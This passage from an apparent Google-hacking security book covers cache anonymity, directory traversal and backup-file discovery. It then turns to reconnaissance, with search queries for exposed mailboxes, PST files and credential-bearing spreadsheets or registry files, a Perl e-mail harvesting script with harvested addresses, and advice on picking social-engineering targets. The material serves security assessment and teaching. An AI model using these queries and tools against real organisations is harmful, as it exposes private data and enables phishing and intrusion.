To see this concept in action, consider the directory listing shown in Figure 3.17. Clicking the link for index.htm will display that page in your browser with all the associated graphics and text, just as the author of the page intended. This happens because the Web server follows a set of rules about how to display types of files to the user.
HTML files are sent as is to your browser, with very little modification (actually there are some exceptions, such as server-side includes). When you view an HTML page in your browser, you can simply perform a view source to see the source code of the page.

PHP files, by contrast, are first executed on the server. The results of that executed program are then sent to your browser in the form of HTML code, which your browser then displays. Performing a view source on HTML code that was generated from a PHP script will not show you the PHP source code, only the HTML. It is not possible to view the actual PHP source code unless something somewhere is misconfigured. An example of such a misconfiguration would be copying the PHP code to a filename that ends in something other than PHP, like BAK. Most Web servers do not understand what a BAK file is. Those servers, then, will display a PHP.BAK file as text. When this happens, the actual PHP source code is displayed as text in your browser. As shown in Figure 3.18, PHP source code can be quite revealing, showing things like SQL queries that list information about the structure of the SQL database that is used to store the Web server's data.

Figure 3.18 Backup Files Expose SQL Data
[Screenshot: a browser displaying an index.php.bak file, found with inurl:index.php.bak, as plain text. The visible PHP source includes a require of inc/common.inc.php and a mysql_query call whose SELECT statement joins the entries and users tables.]

[Screenshot: a Google-cached directory listing, "Index of /", with the search terms index, of, php, and bak highlighted. The listing includes index.html.bak, index.php.bak, and index1.php.bak among files dated July through September 2004.]

Directory listings also provide insight into the file extensions that are in use in other places on the site. If a system administrator or Web authoring program creates backup files with a .BAK extension in one directory, there's a good chance that BAK files will exist in other directories as well.

Summary

The Google cache is a powerful tool in the hands of the advanced user. It can be used to locate old versions of pages that may expose information that normally would be unavailable to the casual user. The cache can be used to highlight terms in the cached version of a page, even if the terms were not used as part of the query to find that page. The cache can also be used to view a Web page anonymously via the &strip=1 URL parameter, and it can even be used as a transparent proxy server with creative use of the translation service. An advanced Google user will always pay careful attention to the details contained in the cached page's header, since there can be important information about the date the page was crawled, the terms that were found in the search, whether the cached page contains external images, links to the original page, and the text of the URL used to access the cached version of the page.
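The &strip=1 modification mentioned above amounts to editing a query string. The following is a minimal sketch in Python, assuming you already have a cached-page URL copied from a results page; the function name add_strip_param and the sample URL are illustrative only and are not part of any Google API.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def add_strip_param(cached_url):
    """Return cached_url with strip=1 set exactly once in its query string."""
    parts = urlsplit(cached_url)
    # Keep every existing parameter except a previous strip value.
    params = [(key, value)
              for key, value in parse_qsl(parts.query, keep_blank_values=True)
              if key != "strip"]
    params.append(("strip", "1"))
    return urlunsplit(parts._replace(query=urlencode(params)))


if __name__ == "__main__":
    # Hypothetical cached-page URL, used only to show the rewrite.
    print(add_strip_param("http://www.google.com/search?q=cache:www.example.com/&hl=en"))
```

Because the query string is re-encoded, characters such as the colon in cache: come back percent-encoded; the URL still means the same thing to the server.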
Directory listings, although somewhat uncommon, contain a great deal of information that is interesting from a security perspective. In this chapter, we saw that directory listings can be used to locate specific files and directories and that directory listings can be used to determine specific information about the software installed on a server. Traversal techniques can be used to locate information often outside the piercing gaze of Google's crawlers. Some specific techniques we explored included directory traversal, incremental substitution, and extension walking. When combined with effective Google searching, these techniques can often unearth all sorts of information that Google searching alone cannot reveal. In addition, some traversal techniques can be used to actually compromise a server, giving an attacker wide-open access to a server.

Solutions Fast Track

Anonymity with Caches

■ Clicking the cache link will not only load the page from Google's database, it will also connect to the real server to access graphics and other non-HTML content.
■ Adding &strip=1 to the end of a cached URL will only show the HTML of a cached page. Accessing a cached page in this way will not connect to the real server on the Web and could protect your anonymity if you use the cut and paste method shown in this chapter.

Using Google as a Proxy Server

■ Google can be used as a transparent proxy server, thanks to the translation service.
■ This technique requires URL modification, specifically the modification of the langpair parameter. To use this technique, set the langpair values to the same language, such as langpair=en%7Cen.

Locating Directory Listings

■ Directory listings contain a great deal of invaluable information.
■ The best way to home in on pages that contain directory listings is with a query such as intitle:index.of "parent directory" or intitle:index.of name size.
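The directory-listing queries above all follow one pattern: the intitle:index.of operator followed by extra terms, with multi-word phrases quoted. The sketch below is one way to assemble such query strings in Python; the helper name index_of_query is an assumption made for illustration, and the code only builds strings, it does not contact Google.

```python
def index_of_query(*terms):
    """Build an intitle:index.of query; terms containing spaces are quoted."""
    parts = ["intitle:index.of"]
    for term in terms:
        # Phrases such as "parent directory" must be quoted to stay together.
        parts.append('"%s"' % term if " " in term else term)
    return " ".join(parts)


if __name__ == "__main__":
    print(index_of_query("parent directory"))
    print(index_of_query("name", "size"))
    # A server tag phrase, as used for server versioning in this chapter.
    print(index_of_query("Apache/2.0.52 server at"))
```

Keeping the quoting rule in one place makes it harder to drop the quotes around a phrase by accident, which would turn a phrase search into a search for separate words.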
Locating Specific Directories in a Listing

■ You can easily locate specific directories in a directory listing by adding a directory name to an index.of search. For example, intitle:index.of inurl:backup could be used to find directory listings that have the word backup in the URL. If the word backup is in the URL, there's a good chance it's a directory name.

Locating Specific Files in a Directory Listing

■ You can find specific files in a directory listing by simply adding the filename to an index.of query, such as intitle:index.of ws_ftp.log.

Server Versioning with Directory Listings

■ Some servers, specifically Apache and Apache derivatives, add a server tag to the bottom of a directory listing. These server tags can be located by extending an index.of search, focusing on the phrase server at, for example, intitle:index.of server.at.
■ You can find specific versions of a Web server by extending this search with more information from a correctly formatted server tag. For example, the query intitle:index.of server.at "Apache Tomcat/" will locate servers running various versions of the Apache Tomcat server.

Directory Traversal

■ Once you have located a specific directory on a target Web server, you can use this technique to locate other directories or subdirectories.
■ An easy way to accomplish this task is via directory listings. Simply click the parent directory link, taking you to the directory above the current directory. If this directory contains another directory listing, you can simply click links from that page to explore other directories. If the parent directory does not display a directory listing, you might have to resort to a more difficult method, guessing directory names and adding them to the end of the parent directory's URL. Alternatively, consider using site and inurl keywords in a Google search.
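Clicking the parent directory link repeatedly is the same as trimming one path segment at a time from the URL. The following Python sketch lists the parent directory URLs for a starting URL; the function name parent_directories and the host www.example.com are assumptions made for illustration, and the code only manipulates strings without requesting anything from a server.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit


def parent_directories(url):
    """List each parent directory URL, nearest parent first, ending at the root."""
    parts = urlsplit(url)
    path = parts.path
    if not path.endswith("/"):
        # The URL names a file: start from the directory that contains it.
        path = posixpath.dirname(path)
    path = path.rstrip("/")
    parents = []
    while path:
        path = posixpath.dirname(path)  # climb one level
        directory = path if path.endswith("/") else path + "/"
        parents.append(urlunsplit((parts.scheme, parts.netloc, directory, "", "")))
        path = path.rstrip("/")
    return parents


if __name__ == "__main__":
    start = "http://www.example.com/bpa/acadunits/admin/envr/bowman/"
    for parent in parent_directories(start):
        print(parent)
```

For the path used in the chapter's example, the first two results are the envr and admin directories, which matches the two clicks described in the Directory Traversal section.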
Incremental Substitution

■ Incremental substitution is a fancy way of saying "take one number and replace it with the next higher or lower number."
■ This technique can be used to explore a site that uses numbers in directory or filenames. Simply replace the number with the next higher or lower number, taking care to keep the rest of the file or directory name identical (watch those zeroes!). Alternatively, consider using site with either inurl or filetype keywords in a creative Google search.

Extension Walking

■ This technique can help locate files (for example, backup files) that have the same filename with a different extension.
■ The easiest way to perform extension walking is by replacing one extension with another in a URL, for example replacing html with bak.
■ Directory listings, especially cached directory listings, are easy ways to determine whether backup files exist and what kinds of file extensions might be used on the rest of the site.

Links to Sites

■ www.all-nettools.com/pr.htm A simple proxy checker that can help you test a proxy server you're using.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: Can Google find Web pages that aren't linked from anywhere else on the Web?

A: This question requires two answers. The first answer is "Yes." Anyone can add a URL to Google's database by filling out the form at www.google.com/addurl.html. The second answer is "Maybe" and requires a bit of explanation.
The Opera Web browser includes a feature that sends data to Google when a user types a URL into the address bar. The entered URL is sent to Google, and that URL is subsequently crawled by Google's bots. According to the FAQ posted at www.opera.com/adsupport:

The Google system serves advertisements and related searches to the Opera browser through the Opera browser banner 468x60 format. Google determines what ads and related searches are relevant based on the URL and content of the page you are viewing and your IP address, which are sent to Google via the Opera browser.

There is no substantial evidence that proves that Google includes this link in its search engine. However, testing shows that when a previously unindexed URL (http://johnny.ihackstuff.com/temp/suck.html) is entered into Opera 7.2.3, a Googlebot crawls that URL moments later, as shown by the following log excerpts:

64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"

Opera users should not expect typed URLs to remain "unexplored."

Q: I use Opera. Can I turn off the Google crawling feature?

A: Yes. This feature can be turned off within Opera by selecting Show generic selection of graphical ads from File | Preferences | Advertising.

Q: Searching for backup files seems cumbersome. Is there a better way?

A: Better, meaning faster, yes. Many automated Web tools (such as WebInspect from www.spidynamics.com) offer the capability to query a server for variations of existing filenames, turning an existing index.html file into queries for index.html.bak or index.bak, for example. These scans are generally very thorough but very noisy and will almost certainly alert the site that you're scanning.
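The filename variations described in this answer, together with the incremental substitution technique from earlier in the chapter, are simple string transformations. The Python sketch below generates candidate paths only and makes no requests; it is not how WebInspect or any other named tool works internally. The function names are assumptions made for illustration, and .bak is used as the default suffix because it is the only backup extension the chapter discusses.

```python
import posixpath
import re


def backup_variants(path, suffixes=(".bak",)):
    """index.html -> index.html.bak and index.bak, for each suffix given."""
    directory, filename = posixpath.split(path)
    stem, _extension = posixpath.splitext(filename)
    variants = []
    for suffix in suffixes:
        # Try the suffix appended to the full name and swapped for the extension.
        for name in (filename + suffix, stem + suffix):
            candidate = posixpath.join(directory, name)
            if candidate != path and candidate not in variants:
                variants.append(candidate)
    return variants


def neighbor_numbers(path):
    """Replace the last number in path with the next lower and next higher
    value, keeping the original zero padding (watch those zeroes)."""
    matches = list(re.finditer(r"\d+", path))
    if not matches:
        return []
    last = matches[-1]
    digits = last.group(0)
    results = []
    for value in (int(digits) - 1, int(digits) + 1):
        if value < 0:
            continue  # there is no file "-1"
        padded = str(value).zfill(len(digits))
        results.append(path[:last.start()] + padded + path[last.end():])
    return results


if __name__ == "__main__":
    print(backup_variants("/docs/index.html"))
    print(neighbor_numbers("/DigLib_thumbnail/spmg/hel/0001/H/"))
```

Note that neighbor_numbers always picks the last run of digits in the path, so a digit inside an extension (for example mp3) would be the one changed; a real tool would need a smarter rule.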
WebInspect is better suited for this task than Google Hacking, but many times a low-profile Google scan can be used to get a feel for the security of a site without alerting the site's administrators or intrusion detection system (IDS). As an added benefit, any information gathered with Google can be reused later in an assessment.

Q: Backup files seem to create security problems, but these files help in the development of a site and provide peace of mind that changes can be rolled back. Isn't there some way to keep backup files around without the undue risk?

A: Yes. A major problem with backup files is that in most cases, the Web server displays them differently because they have a different file extension. So there are a few options. First, if you create backup files, keep the extensions the same. Don't copy index.php to index.bak but rather to something like index.bak.php. This way the server still knows it's a PHP file. Second, you could keep your backup files out of the Web directories. Keep them in a place you can access them but where Web visitors can't get to them. The third (and best) option is to use a real configuration management system. Consider using a CVS-style system that allows you to register and check out source code. This way you can always roll back to an older version, and you don't have to worry about backup files sitting around.

Chapter 4

Pre-Assessment

Solutions in this Chapter:

■ The Birds and the Bees
■ Long Walks on the Beach
■ Romantic C
■ List of Sites
■ Summary
■ Solutions Fast Track
■ Frequently Asked Questions

Introduction

In this chapter, we'll discuss what's called pre-assessment information-gathering techniques. During this phase of an assessment, the security tester is most interested in obtaining preliminary information about the target.
This does not include specific information such as IP addresses and DNS names (which we discuss in the next chapter) but rather information that could be used for social manipulation (talking a help desk operator into a password change), physical compromise of a target (gaining information about building structures or badge layouts), and general reconnaissance. Throughout this chapter, we focus on methods to locate information about the target that will most likely be used in later phases of the assessment.

In a twisted sort of way, pre-assessment work is a bit like preparing for the perfect date. You might do a bit of research about the person, get some information about them and their friends and family, spend quality time with them, and learn as much as you can about their interests. Although the stakes are much higher, courting your target can be like courting your mate. When things get rough, plan to spend some time sleeping in a chair or a couch instead of in a nice, warm bed where you belong! Let's carry that analogy through the chapter and examine how the stages of pre-assessment mirror the stages of courtship.

The Birds and the Bees

One of the first steps you need to take is to try to understand the target company structure and environment. Visiting the company Web site can provide some information, but keep in mind that you're only seeing what they want you to see. To get behind the scenes, a simple site:somecompany.com search will often reveal information that wasn't meant to be seen by the public. This search has one major drawback, however: for a large company, it could return thousands of results, many of which are useless and a huge waste of your time. In this section we look at techniques (grinding techniques, specifically) that you can use to weed through all this data, but for now it might be a better idea to target your searches to find the useful data.

Intranets and Human Resources

Where do you go if you want the inside scoop on a company? What better department to start with than Human Resources! Since just about anything intentionally viewable by the public tends to be watered down, we'll need to get behind the scenes. Many companies like to make company information available to their employees (and only their employees), and to do so they set up company intranets containing information for employee eyes only. Intranets are supposed to be private, but combining Human Resources and intranet into a search such as intitle:intranet inurl:intranet +intext:"human resources" shows that private sites sometimes aren't exactly private, as we can see in Figure 4.1.

Figure 4.1 Human Resources Intranet Pages
[Screenshot: Google Web results for intitle:intranet inurl:intranet +intext:"human resources", showing results 1 - 10 of about 3,130. The hits include several university intranet pages with Human Resources sections.]

In addition to providing you with information about the company policies and procedures, most HR intranet sites provide the names of contact people for the department. These names can be very useful for future social engineering attacks.

Underground Googling...

A Wealth of Information Lies in the Company Intranet

Don't limit yourself to the Human Resources department. Companies put all sorts of information on their intranets, since they assume they are safe from public eyes. Replacing the human resources part of the query with computer services, IT department, or simply phone can provide amazing amounts of additional information that you can later use during the social engineering phase. Chapter 7 contains more information about using the company intranet to your advantage.

Help Desks

A simple search listed in Chapter 7's Top 10 searches is intranet | help.desk, or simply ("help.desk" | helpdesk). Combined with the site operator, this query is designed to locate intranets or help desk pages. Help desk references are extremely valuable because they often refer to documents and procedures an attacker could use to gather information about the target.

Self-Help and "How-To" Guides

These documents are designed to help an end user perform some sort of procedure. Used creatively, they can provide information about the target that could prove useful at some point during an assessment. For example, a kludgey search such as "how to" network setup dhcp ("help desk" | helpdesk) can reveal documents that include instructions for connecting to a network, as shown in Figure 4.2.
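The intranet, help desk, and how-to queries in this section become more useful once each is restricted to the target with the site operator. The Python sketch below prepends a site restriction and URL-encodes the result; the names restrict_to_site and search_url, the base search URL, and the somecompany.com domain are assumptions made for illustration, and the code only builds strings.

```python
from urllib.parse import quote_plus

# Queries quoted from this section of the chapter.
PRE_ASSESSMENT_QUERIES = [
    'intitle:intranet inurl:intranet +intext:"human resources"',
    "intranet | help.desk",
    '"how to" network setup dhcp ("help desk" | helpdesk)',
]


def restrict_to_site(query, domain):
    """Prefix a query with the site operator for one domain."""
    return "site:%s %s" % (domain, query)


def search_url(query, base="http://www.google.com/search?q="):
    """URL-encode a query string so it can be pasted into an address bar."""
    return base + quote_plus(query)


if __name__ == "__main__":
    for query in PRE_ASSESSMENT_QUERIES:
        scoped = restrict_to_site(query, "somecompany.com")
        print(scoped)
        print("  " + search_url(scoped))
```

Keeping the queries in a list makes it easy to rerun the same set against a different domain, or to swap "human resources" for another department name as the sidebar suggests.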
Figure 4.2 "How-To" Documents Are Revealing
[Screenshot: a university "Networking Guide: Macintosh (MacOS 8.x-9.x)" page found with "how to" network setup dhcp ("help desk" | helpdesk). The page walks through TCP/IP settings (connect via Ethernet, configure using DHCP, leave the DHCP client ID empty), AppleTalk settings, the Help Desk extension, and how student e-mail is provided through Novell GroupWise, including a Web client reachable from any Internet-connected computer.]
This page lists a virtual gold mine of information:

■ Network information: DHCP, no client ID, AppleTalk, Ethernet.
■ Recommended browsers: The download link lists recommended browsers and version information.
■ Help desk phone number: x1705; an RCC comes to your room.
■ E-mail information: ID can be generated by the IT department.
■ E-mail information: Site uses Novell GroupWise.
■ E-mail information: Web-based (!) e-mail server located online at http://gw5.XXX.edu.
■ E-mail information: E-mail server is available from the Internet.

This is not an uncommon how-to document. Most are overly informative, supplying a great deal of information that an attacker can use.

Job Listings

Job listings can also reveal information about a target, including technologies in use, corporate structure, geography, and more. One of the easiest ways to locate job postings is with a simple query such as resume | employment combined with the site operator. Don't overlook job listings as an important source of information about an organization.

Underground Googling...

Public Polling Via Google

Google can be used to map the public opinion of a site over time. First, build two lists of Google queries. The first list combines the common name of a company with 100 common "good" phrases such as good experience, wise investment, well-managed, and so on. Next, create a second list that combines the company name with 100 "bad" phrases such as poor customer service, shady management, and beware. Feed these lists into Google every day for an extended period of time, mapping not only the numbers of hits but the page rank of each referring site. This kind of nonobvious statistical information can speak volumes about a company's image (as well as provide a decent financial investment road map!).

Long Walks on the Beach

During the courtship process, a couple often spends time getting to know one another.
Similarly, during a penetration test, it's not a bad idea to get "personal" with your target, or specifically the people working for the organization. Digging up details about the people who make up an organization can pay off in big ways during later assessment phases. Usernames, employee numbers, or Social Security numbers can be used to social engineer a help desk technician. E-mail addresses can be targeted with e-mails containing malware. Information about an individual's circle of friends can be used to social engineer that individual. Any little tidbit of information can be used by a creative security tester to gain access to more information, causing a snowball effect that often leads to system or network compromise. In this section, we'll take a look at some ways Google can be used to harvest this type of information.

Names, Names, Names

One way Google excels at helping the researcher dig up additional names and e-mail addresses is through its Google Groups searches. Google Groups (formerly DejaNews) is simply a Usenet archive that keeps copies of all posts made to thousands of Usenet groups over the years. For example, performing a Google Groups search on somecompany.com returns some nice information, as shown in Figure 4.3.

Figure 4.3 Results of Google Groups Query for somecompany.com
[Screenshot: Google Groups results for @somecompany.com, about 1,470 hits. Each result shows a message excerpt followed by the newsgroup, date, and poster name.]

Notice that the returned results list the name of the poster at the bottom of each result listing. In some cases this information is faked, but depending on the number of results, you could end up with legitimate employee names. Remember that the Google Groups Advanced Search feature (http://groups.google.com/advanced_group_search) allows you to narrow your search by specifying several additional search parameters such as Subject, Author, Date, specific phrases, and more.

Browsing Google Groups results for information can be a daunting task, especially when it comes time to dig through all the pages to find the information you're after. Chapter 10 contains snippets of code that can be used to extract URLs, e-mail addresses, and more from scraped Google Groups result pages.
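To give a feel for that kind of extraction, here is a minimal Python sketch. It is not the Chapter 10 code. It assumes the scraped result text is already held in a string, and the function name extract_emails, the simplified address pattern, and the sample text are all illustrative assumptions.

```python
import re

# Simplified address pattern (an assumption for illustration,
# not a complete RFC 5322 parser).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def extract_emails(text, domain):
    """Return sorted, lowercased addresses in `text` that belong to `domain`."""
    suffix = domain.lower()
    found = set()
    for match in EMAIL_RE.findall(text):
        address = match.lower()
        # Keep user@domain and user@sub.domain, drop everything else.
        if address.endswith("@" + suffix) or address.endswith("." + suffix):
            found.add(address)
    return sorted(found)


# Hypothetical scraped text, loosely modeled on newsgroup excerpts.
sample = (
    "Mail sent to unixadmins@somecompany.com should stop at the DMZ box. "
    "The address JDoe@somecompany.com was rejected; see also bob@example.org."
)
emails = extract_emails(sample, "somecompany.com")
print(emails)
```

Lowercasing and collecting into a set removes duplicates that differ only in case, and the domain filter discards the "fringe" addresses that inevitably share a page with the ones you want.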
Chapter 10 also goes into more detail on how to properly search for, locate, and extract e-mail addresses using regular expressions.

Automated E-Mail Trolling

It would be nice to have a utility to help automate the process of searching for e-mail addresses. Ask and you shall receive! The Perl code that follows, written by Roelof Temmingh of SensePost (www.sensepost.com), will search through Google Groups pages and Google Web pages, hunting for e-mail addresses. To use this tool, you must first obtain a Google API key from www.google.com/apis. Download the developer's kit, copying the GoogleSearch.wsdl file into the same directory as this script. Next, download and install the Expat package from sourceforge.net/projects/expat. This installation requires a ./configure and a make, as is typical with most modern UNIX-based installers. This script also uses SOAP::Lite, which is easiest to install via CPAN. Simply run CPAN from your favorite flavor of UNIX and issue the following commands from the CPAN shell to install SOAP::Lite and various dependencies (some of which might not be absolutely necessary on your platform):

    install LWP::UserAgent
    install XML::Parser
    install MIME::Parser
    force install SOAP::Lite

Although this might seem like a lot of work for one script, most Perl-based Google programs will have the same requirements, meaning that you only need to go through this process once to allow you to run this and other Google querying Perl scripts, some of which are included in later chapters of this book. Be sure to insert your Google API key into this script before running it. Now without further ado, here's the much-anticipated script:

    #!/usr/bin/perl
    #
    # Google Email miner
    # SensePost Research 2003
    # roelof@sensepost.com
    #
    # Assumes the GoogleSearch.wsdl file is in same directory
    #
    $|=1;    # unbuffered output
    use SOAP::Lite;

    if ($#ARGV < 0) {
        die "email-mine <domain> [loops]\nfor example: email-mine sensepost.com 5\n\n";
    }

    #-=-=-=-=-=-# EDIT THIS #-=-=-=-=-==-#
    my $key = "--==Insert Google API Key Here==--";
    my $service = SOAP::Lite->service('file:./GoogleSearch.wsdl');
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#

    my $numloops = $ARGV[1];
    if ($numloops == 0) { $numloops = 5; }
    my $target = $ARGV[0];
    my $query = "\@$target -www.$target";

    ## Do the Google
    for (my $j = 0; $j < $numloops; $j++) {
        print STDOUT "$j ";
        my $results = $service->doGoogleSearch($key, $query, (10*$j), 10,
            "true", "", "true", "", "latin1", "latin1");
        $re = (@{$results->{resultElements}});
        foreach my $results (@{$results->{resultElements}}) {
            push @allemails, extract_email($results->{snippet}, $target);
        }
        # Fewer than 10 results means this was the last page
        if ($re != 10) { last; }
    }

    # Remove duplicates & show results
    print STDOUT "\n";
    @allemails = dedupe(@allemails);
    foreach $email (@allemails) {
        print STDOUT "$email\n";
    }

    ## SUBS ##
    sub extract_email {
        my ($passed, $target) = @_;
        # we want multiple addresses in a single line
        my @in = split(/\s/, $passed);
        my @collected;
        foreach my $line2 (@in) {
            my $emaila;
            chomp $line2;
            # Remove Google's boldifications..
            $line2 =~ s/<b>//g;
            $line2 =~ s/<\/b>//g;
            # You can run but you can't hide ;)
            $line2 =~ s/ at /\@/g;
            $line2 =~ s/\[at\]/\@/g;
            $line2 =~ s/\<at\>/\@/g;
            $line2 =~ s/_at_/\@/g;
            $line2 =~ s/dot/\./g;
            # Try the longest domain form first (four labels), then shorter ones
            $line2 =~ /[\W\t]*([\w\.\-]{1,15})\@([\w\-]+)\.([\w\-]+)\.([\w\-]+)\.([\w\-]+)[\W\t\.]*/;
            $emaila = "$1\@$2.$3.$4.$5";
            if (length($emaila) < 5) {
                $line2 =~ /[\W\t]*([\w\.\-]{1,15})\@([\w\-]+)\.([\w\-]+)\.([\w\-]+)[\W\t\.]*/;
                $emaila = "$1\@$2.$3.$4";
            }
            if (length($emaila) < 4) {
                $line2 =~ /[\W\t]*([\w\.\-]{1,15})\@([\w\-]+)\.([\w\-]+)[\W\t\.]*/;
                $emaila = "$1\@$2.$3";
            }
            # filter out junk email addresses
            my ($name, undef) = split(/\@/, $emaila);
            if (length($emaila) > 0 && $emaila =~ /$target$/i && length($name) < 15) {
                push @collected, $emaila;
            }
        }
        return @collected;
    }

    sub dedupe {
        (@keywords) = @_;
        my %hash = ();
        foreach (@keywords) {
            $_ =~ tr/A-Z/a-z/;    # lowercase so duplicates collapse
            chomp;
            if (length($_) > 1) { $hash{$_} = $_; }
        }
        return keys %hash;
    }

This code, mentioned cursorily in the SensePost paper Putting the Tea Back into CyberTerrorism (do a Google search for Tea Cyberterrorism), performs a Google search for a domain name prepended with an @ sign, excluding the domain's main page. This will effectively search for e-mail addresses, even though Google ignores the @ sign. For example, when searching for gmail.com, this script will search for @gmail.com -www.gmail.com. This excludes hits from the gmail site itself. Consider the output of this query, as shown in Figure 4.4.

Figure 4.4 Trolling for E-Mail Addresses
[Screenshot: Google Web results for "@gmail.com" -www.gmail.com, about 1,730,000 hits.]
Within the first few results, you should notice a few legitimate-looking e-mail addresses, specifically gramophone@gmail.com and all_in_all@gmail.com. You could sift through these results by hand, plucking out e-mail addresses, or you could simply run this Perl script, which does all the heavy lifting for you. We'll run the Perl script, instructing it to search for gmail.com addresses, using only 1 of our 1000 daily allotted API queries (which translates to a total of 10 Google results). The output of this run is shown in Figure 4.5.

Figure 4.5 Trolling for E-Mail Addresses, Simplified

    $ ./email-mine.pl gmail.com 1
    0
    username@gmail.com
    gramophone@gmail.com
    bush04@gmail.com
    lostmon@gmail.com
    kerry04@gmail.com
    all_in_all@gmail.com

Notice that this script also located the e-mail addresses we found when we performed the search manually. This script really begins to shine when we allow it to sift through more results. Allowing the script to process 50 results (run with ./email-mine.pl gmail.com 5) returns many more e-mail addresses, as shown below:

    movabletype@gmail.com
    fakubabe@gmail.com
    lostmon@gmail.com
    label@gmail.com
    charlescapps@gmail.com
    billgates@gmail.com
    ymtang@gmail.com
    tonyedgecombe@gmail.com
    ryawillifor@gmail.com
    jruderman@gmail.com
    itchy@gmail.com
    gramophone@gmail.com
    poojara@gmail.com
    london2012@gmail.com
    bush04@gmail.com
    fengfs@gmail.com
    username@gmail.com
    madrid2012@gmail.com
    somelabel@gmail.com
    bartjcannon@gmail.com
    fillmybox@gmail.com
    silverwolfwsc@gmail.com
    all_in_all@gmail.com
    mentzer@gmail.com
    kerry04@gmail.com
    presidentbush@gmail.com
    prabhav78@gmail.com

Obviously, the vast majority of these e-mail addresses are invalid, but this script really shines when it's fed more specific domain names instead of free Web-based domain names.

Underground Googling...
Patience Pays Off

Searching through thousands of Usenet posts is a tedious and time-consuming process; however, you will find the results well worth the effort. In addition to current employees, you will likely find the names of former employees, who make for great social engineering targets.

Addresses, Addresses, and More Addresses!

E-mail addresses can show up in so many places that it's nearly impossible to list them all. However, let's take a look at some great examples. Both Outlook Express and Eudora, two popular e-mail clients, use the .mbx extension for storage of e-mail. A Google search such as filetype:mbx mbx intext:Subject finds thousands of e-mails or mailboxes sitting on the Internet, as shown in Figure 4.6.

Figure 4.6 E-Mails on the Internet?
[Screenshot: Google Web results for filetype:mbx mbx intext:Subject, about 6,590 hits, each showing raw mailbox headers.]
Obviously, a person's private e-mails can reveal loads of information about that person, as well as the company that person works for. They also provide names of coworkers, friends, and family members as well as any mailing lists they belong to. However, more than e-mails can be found using Google. Many organizations use Microsoft Outlook for their e-mail and calendaring purposes, and it seems that Outlook has become the de facto standard in the workplace. With this in mind, the process of finding e-mails, calendars, and address books can be simplified using a search such as filetype:pst pst (contacts | address | inbox). This search locates Outlook personal mail folders that include the words contacts, address, or inbox in the name. These words can be modified to return many other results.

As shown in Figure 4.7, this query returns an ungodly number of files that were most likely never intended for public viewing. These are, after all, personal e-mail folders.

Figure 4.7 Microsoft Outlook Files on the Internet
[Screenshot: Google Web results for filetype:pst pst (contacts | address | inbox), about 261 hits.]
A search such as filetype:reg reg +intext:"internet account manager" produces some rather eye-opening results. You wouldn't think that people would put such sensitive information on the Internet, but as you can see in Figure 4.8, anything is possible.

Figure 4.8 Registry Files Found by Google
[Screenshot: Google Web results for filetype:reg reg +intext:"internet account manager", showing exported registry files that contain mail account settings.]

The list of potential e-mail address locations could go on and on, but since we're not in the business of reckless tree killing, we'll just round out this section with a few examples from the Google Hacking Database. Table 4.1 presents several queries that can be used to dig up e-mail addresses, sometimes in the strangest of places!

Table 4.1 E-Mail Address Queries

Query: "Internal Server Error" "server at"
Description: Apache server error could reveal admin e-mail address

Query: intitle:"Execution of this script not permitted"
Description: Cgiwrap script can reveal lots of information, including e-mail addresses and even phone numbers

Query: e-mail address filetype:csv csv
Description: CSV files that could contain e-mail addresses

Query: intitle:index.of dead.letter
Description: dead.letter UNIX file contains the contents of unfinished e-mails that can contain sensitive information

Query: inurl:fcgi-bin/echo
Description: fastcgi echo script can reveal lots of information, including e-mail addresses and server information

Query: filetype:pst pst -from -to -date
Description: Finds Outlook PST files, which can contain e-mails, calendaring, and address information

Query: intitle:index.of inbox
Description: Generic "inbox" search can locate e-mail caches

Query: intitle:"Index Of" -inurl:maillog maillog size
Description: Maillog files can reveal usernames, e-mail addresses, user login/logout times, IP addresses, directories on the server, and more

Query: inurl:email filetype:mdb
Description: Microsoft Access databases that could contain e-mail information

Query: filetype:xls inurl:"email.xls"
Description: Microsoft Excel spreadsheets containing e-mail addresses

Query: filetype:xls username password email
Description: Microsoft Excel spreadsheets containing the words username, password, and email

Query: intitle:index.of inbox dbx
Description: Outlook Express cleanup.log file can contain locations of e-mail information

Query: filetype:eml eml +intext:"Subject" +intext:"From"
Description: Outlook Express e-mail files contain e-mails with full headers

Query: intitle:index.of inbox dbx
Description: Outlook Express e-mail folder

Query: filetype:wab wab
Description: Outlook Mail address books contain sensitive e-mail information

Query: filetype:pst inurl:"outlook.pst"
Description: Outlook PST files can contain e-mails, calendaring, and address information

Query: filetype:mbx mbx intext:Subject
Description: Outlook versions 1-4 or Eudora mailbox files contain sensitive e-mail information

Query: inurl:cgi-bin/printenv
Description: Printenv script can reveal lots of information, including e-mail addresses and server information

Query: inurl:forward filetype:forward -cvs
Description: UNIX user e-mail forward files can list e-mail addresses

Query: ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password | subject
Description: Various generic e-mail files

Query: "Most Submitted Forms and Scripts" "this section"
Description: WebTrends statistics pages reveal directory information, client access statistics, e-mail addresses, and more

Query: filetype:reg reg +intext:"internet account manager"
Description: Windows registry files can reveal information such as usernames, POP3 passwords, e-mail addresses, and more

Query: "This summary was generated by wwwstat"
Description: Wwwstat statistics information can reveal directory info, client access statistics, e-mail addresses, and more

It's fairly rare to uncover these "gifts" of information during an assessment, but it's often surprising what will turn up. In most cases, you'll be better off trolling for addresses using less "direct" techniques, but if you happen to get a hit on one of these queries during an assessment, the payoff can be huge. Consider a query for filetype:eml eml +intext:"Subject" +intext:"From", shown in Figure 4.9. This query can reveal full e-mail messages, including all header information. This much information can be very useful during a security audit.

Figure 4.9 Full E-Mails Are a Rare Treasure
[Screenshot: Google Web results for filetype:eml eml +intext:"Subject" +intext:"From", each showing complete message headers.]
Nonobvious E-Mail Relationships

